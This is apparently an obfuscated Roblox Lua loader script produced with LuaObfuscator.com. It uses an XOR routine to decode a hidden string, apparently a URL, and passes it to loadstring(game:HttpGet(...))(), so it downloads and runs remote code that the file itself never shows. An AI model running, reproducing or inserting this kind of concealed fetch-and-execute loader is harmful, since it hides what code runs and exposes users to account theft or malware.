--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0 = string.char;
local v1 = string.byte;
local v2 = string.sub;
local v3 = bit32 or bit;
local v4 = v3.bxor;
local v5 = table.concat;
local v6 = table.insert;
local function v7(v8, v9)
	local v10 = 0;
	local v11;
	while true do
		if (v10 == 0) then
			v11 = {};
			for v12 = 1 + 0, #v8 do
				v6(v11, v0(v4(v1(v2(v8, v12, v12 + (2 - 1))), v1(v2(v9, 1 + (v12 % #v9), (620 - (555 + 64)) + (v12 % #v9) + (932 - (857 + 74))))) % (824 - (367 + 201))));
			end
			v10 = 928 - (214 + 713);
		end
		if (v10 == (1 + 0)) then
			return v5(v11);
		end
	end
end
loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\193\194\200\49\227\185\206\16\159\192\212\40\169\169\198\9\158\215\243\52\196\176\227\70\200", "\126\177\163\187\69\134\219\167")))();
